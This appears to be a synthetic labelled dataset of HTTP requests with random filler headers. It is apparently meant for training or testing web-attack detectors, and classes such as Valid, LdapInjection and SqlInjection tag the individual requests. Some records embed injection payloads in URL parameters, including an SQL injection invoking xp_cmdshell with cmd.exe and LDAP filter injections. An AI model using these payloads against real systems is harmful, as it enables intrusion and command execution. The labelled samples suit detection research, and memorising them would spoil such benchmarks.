Cookie: LRrvarVdOO=n;gtP=651976;RYdKBe=35;H6e@B.PJ=1lTh6mh
Cookie2: $Version="071"
Date: Wed, 11 Feb 04 02:04:28 UTC
ETag: W/"bZO8O_UnUbgrxB2"
Expect: 100-continue
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Tue, 01 Aug 06 02:02:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dDYwbmx1cHNyaXQ3YWlzdlFxcmFwVHRlbXIzTXhucm1yaGhmaW9FdXM=
Authorization: Digest cnonce="rlweenE"
Range: -99
Referer: http://www.efpttVn.uk/atl7l.msf
TE: gzip
Trailer: Date
User-Agent: ss8o (hgBQGNhpx; m6uMTSnN7R; iDw-ekoB)
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: atme/0.2 www.e5eofd4.png, 4.8 www.76ei.gif, 0.0 www.ooneuei.gif
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

9cl=ye;croeehadkwh0&8obwjetdueqo=X h&wae9Ntetr=teeaft4hencdcor&ito=kn8elo&ubiad=Dee'    or     hfst/aC/child::node()[processing-instruction()=287] or    'ehm7aTjd'    =    '&B@VQFXb28U.@=25&oli=dI2fm_pICZ3V&dneomneeoebi=48&l1tGTNaeaaul=eY9H&nashdinmnt=7806&eaoenr7e0nfd=729&.UzrzBc8_Po=oYHALdZdBY&ci38ocgahphtb=e9tonp&upAerrixfoen7at=Di/

End - Id: 48569
Start - Id: 2824
class: Valid
GET /Fadmincf/uOW6c9pciumtKvqHC/tBX/hCdU/jate91yjntezeh/soetAl/eql7HlNNm-YZifXYDD3o/dnrnl3kEciadaa/gkss7PsCT_Do45dX/oietwe0mnewen/Dikrlizaeq/sheesl8fUi3.cgi? HTTP/1.0
Host: www.sutvhendu.cz
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.8, x-mac-korean, x-mac-arabic;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 128.156.51.190
Cookie: cDeeefatdmite=u4yEs tta5ft10;cbm=5460488
Cookie2: $Version="3"
Date: Thu, 23 Jun 05 07:39:24 CET
ETag: "hcNaxx7E@Au@DR0w"
Expect: Nxkt
From: amctiaa@rubrn.net
If-Modified-Since: Sun, 05 Oct 08 11:20:59 GMT
If-Unmodified-Since: Wed, 12 Dec 07 13:41:13 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Sep 09 05:04:15 CET
Max-Forwards: 72
MIME-Version: 8.2
Pragma: tiieiel=enerus
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: NTLM bzM4bmgzVGh0bHlhaXJhZHRlc2U1YzNlRGxiOWFhOGlpdHFhY2Vj
Range: -648
Referer: http://www.ttor.biz/leins6.html
TE: trailers,gzip;q=0.4
Trailer: If-Range
User-Agent: Mozilla/5.6 (X11; U; Unix 1.8; ha-cm; rv:2.9.6) Gecko/61365856
UA-CPU: Sparc
UA-Disp: 462,5180,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: 6.6 192.92.16.249, 0.2 www.ruurcpt.png:93, 7.7 193.70.170.142
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 8694580923107
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2824
Start - Id: 13056
class: Valid
GET /e6azpig/eApQio1dNsUm9-DlqCo7/tado/e0SMn8mailj3Wdivhl9/oreat/ebIcode23nqanfj/eh/lr/nmkxtWjAogn/aseooeroai.jpg?e7icmgrh97=ashutdown&ao1dhoan=d+&nn5ereLatenew=tvLUzEjp.me3&gsib=e&Rtkdndauw=08427&oghmsph1rkVztb=y&Eai9=eccnife7taO&aofs4on=u HTTP/1.0
Host: www.releswn.cz
Connection: keep-alive
Accept: application/*, image/*, application/rtf
Accept-Charset: ks_c_5601-1987;q=0.3, macintosh, x-mac-hebrew;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 215.148.83.171
Cookie: j5cfna2e=dow;uXa6n=14
Cookie2: $Version="987"
Date: Tue, 28 Jul 09 02:16:33 UTC
ETag: W/"@Ix4QP9PqBJLkjh-Oj"
Expect: 100-continue
From: Henettnv@trgwce.uk
If-Modified-Since: Sun, 27 Jun 04 02:48:16 CET
If-Unmodified-Since: Tue, 13 Jan 09 04:23:20 GMT
If-Match: "1vtbHW@uCo64sT_"
If-None-Match: "-Mqu4@LZ4ePxPRR"
If-Range: Fri, 18 Jul 08 17:06:49 GMT
Max-Forwards: 6
MIME-Version: 4.1
Pragma: lra=bn7L
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: Basic c3RhaW84bDppdzJyYUhnbw==
Range: 309-6,-2
Referer: http://www.nrnt.com/enBsma/lqst/eetltaba/taeN8.bin
TE: trailers,trailers
Trailer: Authorization
User-Agent: rmea/4.8.8
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x190
Via: 5.6 117.109.226.187, 6.1 53.119.82.60
Transfer-Encoding: compress
Upgrade: er4nxy/4.1, isaqen/1.6, iN16e/5.5
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 11062
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13056
Start - Id: 7854
class: Valid
PUT /_cmd1.httpsGEbodyp/eoAE398GB@2QwLq_/stYX5S-v10_8K/7ofe/iU.ViIr/thAkLA382AKIp5e_pSWY/czMdlZCB/agdP3@E8U5dud3/oDbe/O2n6enyz7we/xSQaz.mspx? HTTP/1.1
Content-Length: 34
Content-Language: bi3oi,7djr
Content-Encoding: compress
Content-Location: http://CentOoe.be/izFiv5.png
Content-MD5: RW1pcnRpQXVoc2FnQXRnbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Nov 05 18:45:12 GMT
Last-Modified: Thu, 04 Jan 07 11:16:34 UTC
Host: www.nboydq4hsz.net:71
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.2, deflate, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 84.201.37.41
Cookie: Q4zkZ=610886937;Etg=661
Cookie2: $Version="69"
Date: Wed, 16 Jan 08 04:31:34 CET
ETag: "XZ-N4lID.peR7jC0Yvvu"
Expect: 100-continue
From: rnda3N@eUsEnd.cz
If-Modified-Since: Thu, 13 May 04 05:25:34 GMT
If-Unmodified-Since: Wed, 01 Dec 04 17:28:01 GMT
If-Match: *
If-None-Match: "yhA8NaXvPmLMSk@K"
If-Range: "ZTg8mhdo9i81SCWFg4Q3"
Max-Forwards: 79
MIME-Version: 9.2
Pragma: aentee=t
Proxy-Authorization: NTLM aW9SMXdhem9zZWhpMzRubklpdGhlcEVlZW9sZXJubjRxZWF3dEFkcGE=
Authorization: nsmoh aiwtevnA=o7aE
Range: 3-90,72191-
Referer: http://www.MgI3.st/nfit6rw.gif
TE: trailers
Trailer: TE
User-Agent: fmWh2WPQA http://www.ejAtet.be
UA-CPU: MIPS
UA-Disp: 6357,331,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 669x1617
Via: 4.4 87.36.101.174, feHo/7.3 www.6xceta.jpg
Transfer-Encoding: deflate
Upgrade: geop/6.3, gadsi/7.1, Risfc/1.7, ieeeh8/4.3, ht1/2.2
Warning: 393 www.e0nt7dn.jpeg "mel9ehnAlnr" "Sun, 07 Sep 08 05:30:02 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dnhYmoo7hsaOieo=saI9ntd0ft2Fhn3 sg

End - Id: 7854
Start - Id: 34758
class: Valid
PUT /eurLgP2/isoaseh7xoovkaeto75/7@smail3opxp_GQUM2nX/Tiha/cot/dOSYk8unVZJCx/iectoeohEpesanbrYhc2/riitoyodownnNrbox/oaebl1ownsrat4fE/nrtdvm2sehrehi/txg@UOGSUDH9Ye.htm? HTTP/1.0
Content-Length: 83
Content-Language: rycmo
Content-Encoding: compress
Content-Location: /ghfHaegn/lbhydcpb/nrbWmba/s6yg.shtml
Content-MD5: VHpvTXRubTdvb29zQzFzcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Dec 04 04:59:20 UTC
Last-Modified: Thu, 11 Mar 10 20:52:33 CET
Host: 27.36.16.65:80
Connection: keep-alive
Accept: text/xml, audio/basic;q=0.9, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, gzip;q=0.1, gzip;q=0.7, identity
Accept-Language: uuhcieir-nmrvaa;q=0.0, salml7ie-rzeu, uTea-rewb
Cache-Control: only-if-cached
Client-ip: 157.24.126.22
Cookie: msnat=782046;hca4ec=rne;idxgnrr=shmmlesaonI6eef
Cookie2: $Version="4"
Date: Wed, 26 Jul 06 04:51:58 CET
ETag: "X8qFngh0UvRsqhcOBdDq"
Expect: 100-continue
From: iaoc1brO@mxbt8wsL.be
If-Modified-Since: Tue, 22 Nov 05 10:16:00 UTC
If-Unmodified-Since: Fri, 24 Nov 06 09:28:42 UTC
If-Match: *
If-None-Match: "2p2FF@8J5e2owUz"
If-Range: *
Max-Forwards: 594
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic cnVoc3l0OmFwbm41
Range: 019-
Referer: http://www.mtpt.it/rsevi1/latss/eecaaisg/Llprs73s.jpeg
TE: gzip
Trailer: Pragma
User-Agent: 5eloelaeot2
UA-CPU: StrongARM
UA-Disp: 807,514,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 012x6742
Via: FTP/6.5 224.60.73.32, 3.7 10.198.123.20:25
Transfer-Encoding: deflate
Upgrade: r4ic/7.1, 0fe/0.7
Warning: 123 100.107.127.239 "n5ewoMdyi4" "Fri, 13 Oct 06 14:28:46 GMT"
X-Forwarded-For: 24.228.137.43
X-Serial-Number: 438515700357527
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

noEeeOeteikrl=851&rer2shet4a=d2lQW&5ybv=esde&newhs1Ii=3&jsnmr=xterm45oe zs&th It9

End - Id: 34758
Start - Id: 38963
class: LdapInjection
GET /Nhttacala/emHhf2/tZLQX/g-2FAqJkwZX/efkOgstaca.cgi?FNuiVkVn7gD=eDDpNjlBjx&trs=664693169&v9=93103&httpsG-dzUm_=fEy%29%28+++%7C+%28qihoi%3D*%29&ortphph2el=0tn+t&bw=909&aeifspEAttnamie=261&htqyl=2693312 HTTP/1.0
Host: www.4fnw6.it
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-2;q=0.5, x-mac-greek;q=0.2, isiri-3342, iso-10646-ucs-2;q=0.7, euc-tw
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 65.168.89.85
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="2"
Date: Tue, 23 Oct 07 19:35:47 GMT
ETag: "UHQB-TkfNTVLF8xK"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Thu, 24 Apr 08 12:29:45 CET
If-Unmodified-Since: Sat, 01 Dec 07 04:42:30 GMT
If-Match: *
If-None-Match: *
If-Range: "vDWG5BbUkt0NAYk"
Max-Forwards: 082
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Basic Z2k4dDppc2Rzc2ZO
Range: -028,1-466,-7
Referer: /SnesCrn/aDa3a9O/faiee.swf
TE: deflate;q=0.8,chunked
Trailer: If-Match
User-Agent: Mozilla/7.4 (X11; U; Open BSD i586 3.9; eh-jL; rv:9.7.1) Gecko/23852162
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: 3.2 www.6rlelaqr.htm:661
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38963
Start - Id: 22576
class: Valid
GET /XdQ1cZwhereA2/.AV@8TZ/SX450z/fIrz/vY01asock_streampDkGjhZIX/coitbE8ro.jpg?w3Eobject=T&fYea=derhanetn7l&a9=p%29renph-gope%5Caaeize+s&iaasyeehk=g8d%2Bsk&rio5eaay=qSzK&wuan4eett0aEzpu=0 HTTP/1.1
Host: www.n9Rrnrn9.fr
Connection: close
Accept: image/*;q=0.5, image/gif;q=0.5
Accept-Charset: iso-8859-8;q=0.9, windows-1252
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 14.142.132.191
Cookie: ipesie=55967407
Cookie2: $Version="51"
Date: Thu, 20 Aug 09 21:33:04 UTC
ETag: W/"XAsOYXqELAWcTGvV"
Expect: icoztpd
From: tetoseli@i9ihet.it
If-Modified-Since: Mon, 04 Dec 06 13:23:01 CET
If-Unmodified-Since: Thu, 22 Mar 07 20:28:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jan 10 15:04:20 CET
Max-Forwards: 7
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: NTLM dXNoZzNvY2xlTmhTYWdobmVpYWNzZWFEbG1vbm9mM2VraWExbndlamZuYQ==
Range: 008-622747,-490549,85-794080
Referer: /ycIAwts/foEee/tAhl/EnsooR/econf.tar
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 8.2; na-Wq; rv:8.8.7) Gecko/97111204
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 012x8198
Via: HTTP/5.6 www.aiToteol.css:4091, seO/4.3 27.8.222.2, FTP/5.4 138.99.221.137
Transfer-Encoding: compress
Upgrade: est/6.1, yae1yo/2.0, qoyxas/8.6
Warning: 801 www.tnclaoit.jpg "crNhnstf" "Mon, 23 Mar 09 09:36:08 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 85960080246851
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22576
Start - Id: 41114
class: SqlInjection
GET /hEmiqmge6lt2/dticzeiy1fbliathlydb/t1b-Q1JfUvti2/n-2hS1fd3SBKwo@.tiff?he5uelvfIi4mPz=7069&ncrcowDddeu=63&vt49cnbXKfdlNse=4&eDn=794&w15lq0Ejv25=tutpt&kzoce0dr8=vnTeecdcstyleeq8g&bTse=9797&cntee0aeaet7irg=%27%3BEXEC++master.dbo.xp_cmdshell+++++%27cmd.exe&m0tz=dsuw&whonpeoi8=79640&napal46n=%5C%3Bhrr%7E6e9h&qletrjhah=eALoh4HG&.6HTAFA=tecc%26iframes%3Fincludeia9g HTTP/1.0
Host: 157.87.69.11
Connection: ira3S
Accept: */*;q=0.1
Accept-Charset: utf-8, shift_jis, iso-10646-ucs-2;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: blehiw-5mhzyjo
Cache-Control: max-age=2592
Client-ip: 7.234.69.89
Cookie: r0=l;s7allttgm=sCWWJ;umgdmsneyoacmh=348
Cookie2: $Version="75"
Date: Wed, 18 Feb 09 23:16:08 CET
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 25 Apr 08 07:44:16 CET
If-Unmodified-Since: Tue, 12 Aug 08 18:15:17 UTC
If-Match: "NYJ5sxLqLtMuby7"
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 89
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Basic dEZhbW9mOnVwYW9uaQ==
Range: -397
Referer: http://www.LEmz5.biz/teetf/Steidh/n5e3m/reeidpvl.fgf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: ssin6ewdah/1.2
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.7 www.nChhkume.jpg, 5.8 www.tdA5iaga.tiff
Transfer-Encoding: deflate
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 120.66.15.37
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41114
Start - Id: 37132
class: LdapInjection
GET /ez9vgj42/9JZ/7LP4f4m-/bRH7qFp9-OEWV.shtml?.hCV.zewoJWdelete=1dakeuEnluE&t8rcEelge=ebuese30zdfsAl&R3uwhascoigo=p2hdxoo8zise4enugn&rnicadouetajIh=orge&0caG5othzuaftAs=5198&vshgroup by.4%uWNK=wllX&hMophltj=%7Ctbsvt&foesTqu=04823&donjh7IR=5762929585&imhdla=113&tTo6tsa4istlc=dUowv0fi2bHF&utmin=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: 156.245.64.89
Connection: mh3seHie
Accept: */*
Accept-Charset: gb2312, x-mac-turkish;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 165.184.227.237
Cookie: ooihfnnzEsu=59726;g2dUDs9=cvnti
Cookie2: $Version="74"
Date: Sun, 19 Jul 09 02:17:46 GMT
ETag: "omsqKnISdrLKr-1_"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Tue, 22 Jul 08 20:27:35 CET
If-Unmodified-Since: Sun, 28 Oct 07 01:40:28 GMT
If-Match: "s73n6l@MZB6r9fOBG"
If-None-Match: "sW9tBDDa1bTwnwhx"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.7
Pragma: aefnttep=u
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: Digest nonce
Range: -972338,855782-
Referer: http://www.sogiogk.uk/ms8irn.php3
TE: trailers,deflate;q=0.3
Trailer: Accept-Language
User-Agent: io3wi/3.6.0.0
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.5 www.ibmt0eie.tiff
Transfer-Encoding: deflate
Upgrade: oEAO/0.4, NrmE/9.1, 2tirU/3.2, dprdqi/9.1, ejn2sn/3.5
Warning: 290 81.121.41.20 "1erpeehEtorXv" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37132
Start - Id: 31920
class: Valid
GET /ehmeOuahioniawweeoUP/mcsmnbeaontwddcir2/bUesAobrmta/ssEahht/3jvqBkhra@2OZc6_-KN/vUHQFPqdYirdbVL0DcIL.msf?xmg=63894127&oktgaaon=nBzvILV6BYOE&nIOcmdBL=6649929065&fallate=1589&rn=nPi&tsecoeamyiath=eGGi-JWLhGri&YlOaahtdeec1uee=sasw3emvhnata0t&litCs3bs=tho+pz8&emrmwIiaeaf0x2=+bbodyiboot.ini%3Eqdperl&bssac2=6703861&r3=O HTTP/1.1
Host: 167.77.161.24
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=0232
Client-ip: 143.11.173.48
Cookie: uZM33=8e4;aaEn7R0QbrrWe=28ireuptr8m;vI56ADservicesDTi=9;esqecjosuansb9=iUS0ZLdMhwxw;VeS-V=5NSe1ndeWrnatu2m;neha=sa
Cookie2: $Version="7"
Date: Thu, 22 Nov 07 08:56:59 UTC
ETag: "_HQ6K0UI4j0FH_P"
Expect: 100-continue
From: haeoa@filcnbidra.net
If-Modified-Since: Fri, 03 Aug 07 09:35:58 GMT
If-Unmodified-Since: Thu, 30 Jul 09 16:51:09 GMT
If-Match: *
If-None-Match: *
If-Range: "7HqeU8rVESP0TcUW"
Max-Forwards: 7
MIME-Version: 0.4
Pragma: epb=hpzi2ehh
Proxy-Authorization: NTLM aFJuSHM5c2hpdGlvSGwwSGZ3dE5hbnBkd2l1b1VwaWR0dnM3YXVyd2FvYW1vdGVu
Authorization: Basic dHRFZTo5UnNiYWlseg==
Range: -8,3314-2228
Referer: http://www.ttweu.gov/heualip/iuh8eutG/deMt/8aaw5el/aCue.doc
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: nP7EUPdh http://www.gu7she.gov
UA-CPU: 68000
UA-Disp: 280,3333,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 049x223
Via: 6.6 www.teBetDbr.png
Transfer-Encoding: taan; nimwemne=neparEeh
Upgrade: mrsd/4.1
Warning: 131 www.apir.html "lnAgieyr2dmtfnwy" 
X-Forwarded-For: 159.180.214.45
X-Serial-Number: 643504609
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31920
Start - Id: 13039
class: Valid
GET /tskboncuetnisistsi/aFAkRAyJDT6HDYHZUKA/b9X5Bu/cenetHW/ctYbr/nepeltWhe5nm9pi0ryga.jpg?LMWt3KDH79G=%40a+ignpwgetth5%5Bfna&Seia=kvUiXH&Iet4nem8emi=173618&mololr6fahtu=csn+&ioheujH=sesaEDnialdtaPyili&i9ew7eE9d=EdniOi2sndslarc&4nulb=413&v8btJtybodyYlocationWn=5taAr7&EqyacceptyQXnvar=Yetcn HTTP/1.1
Host: www.1kNuitN.fr
Connection: 96knesr
Accept: video/quicktime, audio/basic
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 82.22.221.79
Cookie: @WX4=566513;imoahjne9atesf=07306781;utr=2074309624
Cookie2: $Version="0"
Date: Sun, 19 Jul 09 18:07:32 CET
ETag: W/"OKmEAzboWCMrzGY"
Expect: eptntiDy
From: isn1r@lopp9e.fr
If-Modified-Since: Thu, 06 Oct 05 22:03:23 UTC
If-Unmodified-Since: Mon, 27 Dec 04 08:52:54 GMT
If-Match: *
If-None-Match: ".RpdpSlTVrNsQht"
If-Range: Sun, 06 Apr 08 10:47:32 CET
Max-Forwards: 8
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bkdhaHVobGVzdndsZXZzZnVlU3NhZWd0ZWkxeXhpNWVuWnlhaHJpajlzbA==
Authorization: Basic YTA4bDg6c2JBc2hu
Range: 309-6,-2
Referer: /omp5alua/ngyee0/geotmgh2.php3
TE: trailers,trailers,chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 9.6; rt-ad; rv:0.4.6) Gecko/68372891
UA-CPU: x86
UA-Disp: 5331,978,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 011x9947
Via: yloa7a/1.2 163.123.246.41
Transfer-Encoding: identity
Upgrade: uede/9.7
Warning: 652 138.93.253.43 "apimlrrynaOtM" 
X-Forwarded-For: 28.63.48.40
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13039
Start - Id: 15934
class: Valid
GET /gB/GmFpCNbeecho/i@42DRpOchKv-m3pwqql/acObfnrsTIe/mhwoboltzelhfoyiweoe/3eumwei.jpg?nYrbe6sxt=ri_aQJjT&erezn=1&aaihtecvMee=jf&i6icsoepN=rgnln4usnp&nIohodkn3damd=td0ezTrOmosbuta&oyirvtterwx=xtermt&art9f=itEH&yme8deliotaYnn=2005101543&dHsnItie3ej=013&ocedtwnm=ek2&ouhaces=Es%7Ce&ahgns=68586&n0dsnee5c=hmc HTTP/1.0
Host: www.ias4th.net
Connection: keep-alive
Accept: application/x-tar;q=0.2, video/mpeg;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: AlE-so;q=0.1
Cache-Control: min-fresh=54
Client-ip: 80.167.167.42
Cookie: 6hh=snoMPl;ssBR2g=5;41=dei;liswbwdkua4amh=ewhere4wnmochaiiErO;rebd9ltSn=wAe
Cookie2: $Version="1"
Date: Fri, 12 Feb 10 14:09:15 CET
ETag: "09Z@qXdgqn32Nh1uT"
Expect: 100-continue
From: dejt@eiwqestde.org
If-Modified-Since: Fri, 21 May 04 19:45:22 GMT
If-Unmodified-Since: Fri, 01 May 09 12:48:46 GMT
If-Match: "Fz3gcmm6_17e9P43uQ"
If-None-Match: *
If-Range: "An@0FSEr@crbuGwx_4o"
Max-Forwards: 39
MIME-Version: 6.6
Pragma: oe=R
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest realm
Range: -08,0744-,-43437
Referer: http://www.emi2er.be/rsThnoo/ai2mu/frger/Wihdne5e.gif
TE: gzip;q=0.3
Trailer: Trailer
User-Agent: iaaoe/0.7.7
UA-CPU: Sparc
UA-Disp: 9960,6267,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7490x6757
Via: 4.1 145.241.172.175:4, 3.0 3.187.183.123, 5.0 www.futOL.jpg
Transfer-Encoding: compress
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 569 45.208.202.175 "ndwuots3cenlor" 
X-Forwarded-For: 34.10.5.61
X-Serial-Number: 76805929181687362247
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15934
Start - Id: 7434
class: Valid
POST /n3eez.c1CFz_LtF6o/jIQQ9Fo@E/u405JHFmdZwuMwwJMf.png? HTTP/1.0
Content-Length: 59
Content-Language: hgs,i
Content-Encoding: identity
Content-Location: /5rmh/ugeht/sixaag8/mhde.exe
Content-MD5: MWxlc3JqZWlzZWVvVGVhbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Dec 07 07:12:46 CET
Last-Modified: Thu, 29 Jan 09 07:10:57 CET
Host: 62.168.112.63:80
Connection: rna0
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 88.207.186.172
Cookie: r3fUw5ho3V5=e'g%n;ZSH-A=897;tudOir0acur3=Ertsjntt474n0;detYidi6r3= teA;gheeDqf=et:nrwindow.open
Cookie2: $Version="236"
Date: Tue, 07 Sep 04 15:39:33 UTC
ETag: "6vz7sTtTkVMjnt6z"
Expect: 100-continue
From: etjre@ngegAdwy.net
If-Modified-Since: Sat, 15 Sep 07 24:30:34 GMT
If-Unmodified-Since: Thu, 19 Jul 07 21:19:40 GMT
If-Match: "c_a3XpOyvViMivE1fh"
If-None-Match: "DKaSgNw0k_BGtb_S"
If-Range: "fklI3o-z7B_rNwD0"
Max-Forwards: 822
MIME-Version: 0.7
Pragma: Sdoxa=tNren
Proxy-Authorization: NTLM bmU4RW9kd2dobnNtaXJ0YWNub2dyOW55cm1lUE5kdTFmd2dhbGVIMHZpdDA=
Authorization: Basic bnJpbGk5eWU6c2VpYWVXdEE=
Range: 1-587,1-,-06
Referer: http://inollh.de/rsEPL/dtiL/atmtbot/sb7pdq0/m6rJp.php
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: wneilbElr/5.6.6.0
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2293x2568
Via: 9.3 21.243.28.195
Transfer-Encoding: eNrut; eHv3o=tuceeh
Upgrade: aais5e/5.3, eke/9.2, tigCl/6.9
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 137.37.20.120
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

8cbWRstrr=902712&enotg4=ande49ut&vpn=H&pl=rjO&eohgEni0A=eoA

End - Id: 7434
Start - Id: 31420
class: Valid
GET /cD4f0GvFBWvHY/hmI5OrMeU9H/tk/v3SSm7U/pse6cynflwmcnshiw12e/wMe7umH5zN/rawtbieohhra4m.jsp?Uwa=aVV7IOZ8C&hChru8k5=7&anaes6jspt=5&tnhPwC5=%24thslalm9%7Edgeeo&eg=7225&arpeonziN=hNB8nWD&Pexd-QlC_=38925967 HTTP/1.1
Host: 166.79.147.54
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: rarime-weoeeo;q=0.8
Cache-Control: no-cache
Client-ip: 193.151.161.20
Cookie: nomdm4iozrx=euo
Cookie2: $Version="5"
Date: Mon, 23 Apr 07 06:39:56 CET
ETag: W/"7sOhkTNDyscIA8fKo_8S"
Expect: 100-continue
